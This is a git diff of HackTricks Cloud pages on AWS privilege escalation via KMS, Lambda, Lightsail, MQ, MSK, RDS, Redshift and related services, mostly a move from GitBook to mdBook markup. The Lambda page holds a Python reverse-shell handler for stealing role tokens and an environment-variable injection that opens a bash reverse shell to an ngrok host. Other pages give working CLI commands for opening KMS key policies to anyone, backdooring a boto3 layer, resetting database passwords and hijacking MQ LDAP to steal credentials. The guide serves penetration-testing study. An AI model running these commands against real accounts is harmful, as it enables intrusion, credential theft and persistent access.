@@ -0,0 +1,122 @@ +# AWS - KMS Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## KMS + +For more info about KMS check: + +{{#ref}} +../aws-services/aws-kms-enum.md +{{#endref}} + +### `kms:ListKeys`,`kms:PutKeyPolicy`, (`kms:ListKeyPolicies`, `kms:GetKeyPolicy`) + +With these permissions it's possible to **modify the access permissions to the key** so it can be used by other accounts or even anyone: + +```bash +aws kms list-keys +aws kms list-key-policies --key-id # Although only 1 max per key +aws kms get-key-policy --key-id --policy-name +# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default") +aws kms put-key-policy --key-id --policy-name --policy file:///tmp/policy.json +``` + +policy.json: + +```json +{ + "Version": "2012-10-17", + "Id": "key-consolepolicy-3", + "Statement": [ + { + "Sid": "Enable IAM User Permissions", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam:::root" + }, + "Action": "kms:*", + "Resource": "*" + }, + { + "Sid": "Allow all use", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam:::root" + }, + "Action": ["kms:*"], + "Resource": "*" + } + ] +} +``` + +### `kms:CreateGrant` + +It **allows a principal to use a KMS key:** + +```bash +aws kms create-grant \ + --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ + --grantee-principal arn:aws:iam::123456789012:user/exampleUser \ + --operations Decrypt +``` + +> [!WARNING] +> A grant can only allow certain types of operations: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) + +> [!WARNING] +> Note that it might take a couple of minutes for KMS to **allow the user to use the key after the grant has been generated**. 
Once that time has passed, the principal can use the KMS key without needing to specify anything.\ +> However, if it's needed to use the grant right away [use a grant token](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (check the following code).\ +> For [**more info read this**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token). + +```bash +# Use the grant token in a request +aws kms generate-data-key \ + --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ + –-key-spec AES_256 \ + --grant-tokens $token +``` + +Note that it's possible to list grant of keys with: + +```bash +aws kms list-grants --key-id +``` + +### `kms:CreateKey`, `kms:ReplicateKey` + +With these permissions it's possible to replicate a multi-region enabled KMS key in a different region with a different policy. + +So, an attacker could abuse this to obtain privesc his access to the key and use it + +```bash +aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml + +{ + "Version": "2012-10-17", + "Id": "key-consolepolicy-3", + "Statement": [ + { + "Sid": "Enable IAM User Permissions", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": "kms:*", + "Resource": "*" + } + ] +} +``` + +### `kms:Decrypt` + +This permission allows to use a key to decrypt some information.\ +For more information check: + +{{#ref}} +../aws-post-exploitation/aws-kms-post-exploitation.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} 
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md similarity index 77% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md index 57b23ef34..bd1cd7d00 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md @@ -1,27 +1,14 @@ # AWS - Lambda Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## lambda More info about lambda in: -{% content-ref url="../aws-services/aws-lambda-enum.md" %} -[aws-lambda-enum.md](../aws-services/aws-lambda-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-lambda-enum.md +{{#endref}} ### `iam:PassRole`, `lambda:CreateFunction`, (`lambda:InvokeFunction` | `lambda:InvokeFunctionUrl`) @@ -31,8 +18,7 @@ Once the function is set up, the user can **trigger its execution** and the inte A attacker could abuse this to get a **rev shell and steal the token**: -{% code title="rev.py" %} -```python +```python:rev.py import socket,subprocess,os,time def lambda_handler(event, context): s = socket.socket(socket.AF_INET,socket.SOCK_STREAM); @@ -44,7 +30,6 @@ def lambda_handler(event, context): time.sleep(900) return 0 ``` -{% endcode %} ```bash # Zip the rev shell @@ -95,9 +80,8 @@ cat output.txt **Potential Impact:** Direct privesc to the arbitrary lambda service role specified. -{% hint style="danger" %} -Note that even if it might looks interesting **`lambda:InvokeAsync`** **doesn't** allow on it's own to **execute `aws lambda invoke-async`**, you also need `lambda:InvokeFunction` -{% endhint %} +> [!CAUTION] +> Note that even if it might looks interesting **`lambda:InvokeAsync`** **doesn't** allow on it's own to **execute `aws lambda invoke-async`**, you also need `lambda:InvokeFunction` ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:AddPermission` @@ -156,7 +140,6 @@ aws dynamodb put-item --table-name my_table \ An attacker with this permission can **grant himself (or others) any permissions** (this generates resource based policies to grant access to the resource): -{% code overflow="wrap" %} ```bash # Give yourself all permissions (you could specify granular such as lambda:InvokeFunction or lambda:UpdateFunctionCode) aws lambda add-permission --function-name --statement-id asdasd --action '*' --principal arn: 
@@ -164,7 +147,6 @@ aws lambda add-permission --function-name --statement-id asdasd --ac # Invoke the function aws lambda invoke --function-name /tmp/outout ``` -{% endcode %} **Potential Impact:** Direct privesc to the lambda service role used by granting permission to modify the code and run it. @@ -172,12 +154,10 @@ aws lambda invoke --function-name /tmp/outout An attacker with this permission can **grant himself (or others) the permission `lambda:GetLayerVersion`**. He could access the layer and search for vulnerabilities or sensitive information -{% code overflow="wrap" %} ```bash # Give everyone the permission lambda:GetLayerVersion aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion ``` -{% endcode %} **Potential Impact:** Potential access to sensitive information. @@ -188,7 +168,6 @@ The attacker can **modify the code of the lambda to exfiltrate the IAM credentia Although the attacker might not have the direct ability to invoke the function, if the Lambda function is pre-existing and operational, it's probable that it will be triggered through existing workflows or events, thus indirectly facilitating the execution of the modified code. -{% code overflow="wrap" %} ```bash # The zip should contain the lambda code (trick: Download the current one and add your code there) aws lambda update-function-code --function-name target_function \ @@ -199,7 +178,6 @@ aws lambda invoke --function-name my_function output.txt # If not check if it's exposed in any URL or via an API gateway you could access ``` -{% endcode %} **Potential Impact:** Direct privesc to the lambda service role used. 
@@ -209,15 +187,15 @@ aws lambda invoke --function-name my_function output.txt With this permissions it's possible to add environment variables that will cause the Lambda to execute arbitrary code. For example in python it's possible to abuse the environment variables `PYTHONWARNING` and `BROWSER` to make a python process execute arbitrary commands: -{% code overflow="wrap" %} ```bash aws --profile none-priv lambda update-function-configuration --function-name --environment "Variables={PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=\"/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18755 0>&1' & #%s\"}" ``` -{% endcode %} For other scripting languages there are other env variables you can use. For more info check the subsections of scripting languages in: -{% embed url="https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse" %} +{{#ref}} +https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse +{{#endref}} #### RCE via Lambda Layers @@ -263,11 +241,9 @@ You can open `./lambda_layer/boto3/__init__.py` and **add the backdoor in the gl Then, zip that `./lambda_layer` directory and **upload the new lambda layer** in your own account (or in the victims one, but you might not have permissions for this).\ Note that you need to create a python folder and put the libraries in there to override /opt/python/boto3. Also, the layer needs to be **compatible with the python version** used by the lambda and if you upload it to your account, it needs to be in the **same region:** -{% code overflow="wrap" %} ```bash aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6" ``` -{% endcode %} Now, make the uploaded lambda layer **accessible by any account**: 
@@ -290,9 +266,9 @@ The next step would be to either **invoke the function** ourselves if we can or A **more stealth way to exploit this vulnerability** can be found in: -{% content-ref url="../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md" %} -[aws-lambda-layers-persistence.md](../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md) -{% endcontent-ref %} +{{#ref}} +../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md +{{#endref}} **Potential Impact:** Direct privesc to the lambda service role used. 
@@ -304,26 +280,13 @@ Maybe with those permissions you are able to create a function and execute it ca Some lambdas are going to be **receiving sensitive info from the users in parameters.** If get RCE in one of them, you can exfiltrate the info other users are sending to it, check it in: -{% content-ref url="../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md" %} -[aws-warm-lambda-persistence.md](../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md +{{#endref}} ## References -* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) -* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/) +- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) +- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md similarity index 60% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md index 95ec10757..7fc698f64 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md @@ -1,31 +1,17 @@ # AWS - Lightsail Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Lightsail For more information about Lightsail check: -{% content-ref url="../aws-services/aws-lightsail-enum.md" %} -[aws-lightsail-enum.md](../aws-services/aws-lightsail-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-lightsail-enum.md +{{#endref}} -{% hint style="warning" %} -It’s important to note that Lightsail **doesn’t use IAM roles belonging to the user** but to an AWS managed account, so you can’t abuse this service to privesc. However, **sensitive data** such as code, API keys and database info could be found in this service. -{% endhint %} +> [!WARNING] +> It’s important to note that Lightsail **doesn’t use IAM roles belonging to the user** but to an AWS managed account, so you can’t abuse this service to privesc. However, **sensitive data** such as code, API keys and database info could be found in this service. ### `lightsail:DownloadDefaultKeyPair` @@ -71,19 +57,15 @@ aws lightsail get-relational-database-master-user-password --relational-database This permission will allow you to change the password to access the database: -{% code overflow="wrap" %} ```bash aws lightsail update-relational-database --relational-database-name --master-user-password ``` -{% endcode %} If the database isn't public, you could also make it public with this permissions with -{% code overflow="wrap" %} ```bash aws lightsail update-relational-database --relational-database-name --publicly-accessible ``` -{% endcode %} **Potential Impact:** Find sensitive info inside the database. @@ -115,14 +97,12 @@ aws lightsail put-instance-public-ports \ This permissions allows to give an instances access to a bucket without any extra credentials -{% code overflow="wrap" %} ```bash aws set-resource-access-for-bucket \ --resource-name \ --bucket-name \ --access allow ``` -{% endcode %} **Potential Impact:** Potential new access to buckets with sensitive information. 
@@ -179,17 +159,4 @@ aws lightsail update-domain-entry \ **Potential Impact:** Takeover a domain -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md new file mode 100644 index 000000000..5cf41b391 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md @@ -0,0 +1,25 @@ +# AWS - Mediapackage Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +### `mediapackage:RotateChannelCredentials` + +Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials) + +```bash +aws mediapackage rotate-channel-credentials --id +``` + +### `mediapackage:RotateIngestEndpointCredentials` + +Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials) + +```bash +aws mediapackage rotate-ingest-endpoint-credentials --id test --ingest-endpoint-id 584797f1740548c389a273585dd22a63 +``` + +## References + +- [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md new file mode 100644 index 000000000..29aefa731 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md 
@@ -0,0 +1,49 @@ +# AWS - MQ Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## MQ + +For more information about MQ check: + +{{#ref}} +../aws-services/aws-mq-enum.md +{{#endref}} + +### `mq:ListBrokers`, `mq:CreateUser` + +With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ): + +```bash +aws mq list-brokers +aws mq create-user --broker-id --console-access --password --username +``` + +**Potential Impact:** Access sensitive info navigating through ActiveMQ + +### `mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser` + +With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ): + +```bash +aws mq list-brokers +aws mq list-users --broker-id +aws mq update-user --broker-id --console-access --password --username +``` + +**Potential Impact:** Access sensitive info navigating through ActiveMQ + +### `mq:ListBrokers`, `mq:UpdateBroker` + +If a broker is using **LDAP** for authorization with **ActiveMQ**. It's possible to **change** the **configuration** of the LDAP server used to **one controlled by the attacker**. This way the attacker will be able to **steal all the credentials being sent through LDAP**. + +```bash +aws mq list-brokers +aws mq update-broker --broker-id --ldap-server-metadata=... +``` + +If you could somehow find the original credentials used by ActiveMQ you could perform a MitM, steal the creds, used them in the original server, and send the response (maybe just reusing the crendetials stolen you could do this). + +**Potential Impact:** Steal ActiveMQ credentials + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md new file mode 100644 index 000000000..1ca4c4e60 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md 
@@ -0,0 +1,24 @@ +# AWS - MSK Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## MSK + +For more information about MSK (Kafka) check: + +{{#ref}} +../aws-services/aws-msk-enum.md +{{#endref}} + +### `msk:ListClusters`, `msk:UpdateSecurity` + +With these **privileges** and **access to the VPC where the kafka brokers are**, you could add the **None authentication** to access them. + +```bash +aws msk --client-authentication --cluster-arn --current-version +``` + +You need access to the VPC because **you cannot enable None authentication with Kafka publicly** exposed. If it's publicly exposed, if **SASL/SCRAM** authentication is used, you could **read the secret** to access (you will need additional privileges to read the secret).\ +If **IAM role-based authentication** is used and **kafka is publicly exposed** you could still abuse these privileges to give you permissions to access it. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md new file mode 100644 index 000000000..9da7808e3 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md @@ -0,0 +1,18 @@ +# AWS - Organizations Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Organizations + +For more information check: + +{{#ref}} +../aws-services/aws-organizations-enum.md +{{#endref}} + +## From management Account to children accounts + +If you compromise the root/management account, chances are you can compromise all the children accounts.\ +To [**learn how check this page**](../#compromising-the-organization). + +{{#include ../../../banners/hacktricks-training.md}} 
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md similarity index 59% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md index 081a74574..6e8d1b809 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md @@ -1,27 +1,14 @@ # AWS - RDS Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## RDS - Relational Database Service For more information about RDS check: -{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %} -[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-relational-database-rds-enum.md +{{#endref}} ### `rds:ModifyDBInstance` @@ -41,9 +28,8 @@ aws rds modify-db-instance \ psql postgresql://:@:5432/ ``` -{% hint style="warning" %} -You will need to be able to **contact to the database** (they are usually only accessible from inside networks). -{% endhint %} +> [!WARNING] +> You will need to be able to **contact to the database** (they are usually only accessible from inside networks). **Potential Impact:** Find sensitive info inside the databases. @@ -55,9 +41,8 @@ According to the [**docs**](https://docs.aws.amazon.com/AmazonRDS/latest/UserGui #### Postgresql (Aurora) -{% hint style="success" %} -If running **`SELECT datname FROM pg_database;`** you find a database called **`rdsadmin`** you know you are inside an **AWS postgresql database**. -{% endhint %} +> [!TIP] +> If running **`SELECT datname FROM pg_database;`** you find a database called **`rdsadmin`** you know you are inside an **AWS postgresql database**. First you can check if this database has been used to access any other AWS service. You could check this looking at the installed extensions: 
@@ -97,20 +82,18 @@ If you had **raw AWS credentials** you could also use them to access S3 data wit ```sql SELECT aws_s3.table_import_from_s3( 't', '', '(format csv)', - :'s3_uri', + :'s3_uri', aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '') ); ``` -{% hint style="info" %} -Postgresql **doesn't need to change any parameter group variable** to be able to access S3. -{% endhint %} +> [!NOTE] +> Postgresql **doesn't need to change any parameter group variable** to be able to access S3. #### Mysql (Aurora) -{% hint style="success" %} -Inside a mysql, if you run the query **`SELECT User, Host FROM mysql.user;`** and there is a user called **`rdsadmin`**, you can assume you are inside an **AWS RDS mysql db**. -{% endhint %} +> [!TIP] +> Inside a mysql, if you run the query **`SELECT User, Host FROM mysql.user;`** and there is a user called **`rdsadmin`**, you can assume you are inside an **AWS RDS mysql db**. Inside the mysql run **`show variables;`** and if the variables such as **`aws_default_s3_role`**, **`aurora_load_from_s3_role`**, **`aurora_select_into_s3_role`**, have values, you can assume the database is prepared to access S3 data. 
@@ -152,25 +135,21 @@ aws --region eu-west-1 --profile none-priv rds create-db-instance \ ### `rds:CreateDBInstance`, `iam:PassRole` -{% hint style="info" %} -TODO: Test -{% endhint %} +> [!NOTE] +> TODO: Test An attacker with the permissions `rds:CreateDBInstance` and `iam:PassRole` can **create a new RDS instance with a specified role attached**. The attacker can then potentially **access sensitive data** or modify the data within the instance. -{% hint style="warning" %} -Some requirements of the role/instance-profile to attach (from [**here**](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)): +> [!WARNING] +> Some requirements of the role/instance-profile to attach (from [**here**](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)): -* The profile must exist in your account. -* The profile must have an IAM role that Amazon EC2 has permissions to assume. -* The instance profile name and the associated IAM role name must start with the prefix `AWSRDSCustom` . -{% endhint %} +> - The profile must exist in your account. +> - The profile must have an IAM role that Amazon EC2 has permissions to assume. +> - The instance profile name and the associated IAM role name must start with the prefix `AWSRDSCustom` . -{% code overflow="wrap" %} ```bash aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole ``` -{% endcode %} **Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance. 
@@ -178,29 +157,13 @@ aws rds create-db-instance --db-instance-identifier malicious-instance --db-inst An attacker with the permissions `rds:AddRoleToDBInstance` and `iam:PassRole` can **add a specified role to an existing RDS instance**. This could allow the attacker to **access sensitive data** or modify the data within the instance. -{% hint style="warning" %} -The DB instance must be outside of a cluster for this -{% endhint %} +> [!WARNING] +> The DB instance must be outside of a cluster for this -{% code overflow="wrap" %} ```bash aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name ``` -{% endcode %} **Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md
new file mode 100644
index 000000000..810cdf3ff
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md
@@ -0,0 +1,107 @@
+# AWS - Redshift Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Redshift
+
+For more information about RDS check:
+
+{{#ref}}
+../aws-services/aws-redshift-enum.md
+{{#endref}}
+
+### `redshift:DescribeClusters`, `redshift:GetClusterCredentials`
+
+With these permissions you can get **info of all the clusters** (including name and cluster username) and **get credentials** to access it:
+
+```bash
+# Get creds
+aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1
+# Connect, even if the password is a base64 string, that is the password
+psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:" -d template1 -p 5439
+```
+
+**Potential Impact:** Find sensitive info inside the databases.
+
+### `redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM`
+
+With these permissions you can get **info of all the clusters** and **get credentials** to access it.\
+Note that the postgres user will have the **permissions that the IAM identity** used to get the credentials has.
+
+```bash
+# Get creds
+aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1
+# Connect, even if the password is a base64 string, that is the password
+psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439
+```
+
+**Potential Impact:** Find sensitive info inside the databases.
+
+### `redshift:DescribeClusters`, `redshift:ModifyCluster?`
+
+It's possible to **modify the master password** of the internal postgres (redshit) user from aws cli (I think those are the permissions you need but I haven't tested them yet):
+
+```
+aws redshift modify-cluster –cluster-identifier –master-user-password ‘master-password’;
+```
+
+**Potential Impact:** Find sensitive info inside the databases.
+
+## Accessing External Services
+
+> [!WARNING]
+> To access all the following resources, you will need to **specify the role to use**. A Redshift cluster **can have assigned a list of AWS roles** that you can use **if you know the ARN** or you can just set "**default**" to use the default one assigned.
+
+> Moreover, as [**explained here**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), Redshift also allows to concat roles (as long as the first one can assume the second one) to get further access but just **separating** them with a **comma**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';`
+
+### Lambdas
+
+As explained in [https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), it's possible to **call a lambda function from redshift** with something like:
+
+```sql
+CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT)
+RETURNS INT
+STABLE
+LAMBDA 'lambda_function'
+IAM_ROLE default;
+```
+
+### S3
+
+As explained in [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), it's possible to **read and write into S3 buckets**:
+
+```sql
+# Read
+copy table from 's3:///load/key_prefix'
+credentials 'aws_iam_role=arn:aws:iam:::role/'
+region ''
+options;
+
+# Write
+unload ('select * from venue')
+to 's3://mybucket/tickit/unload/venue_'
+iam_role default;
+```
+
+### Dynamo
+
+As explained in [https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), it's possible to **get data from dynamodb**:
+
+```sql
+copy favoritemovies
+from 'dynamodb://ProductCatalog'
+iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';
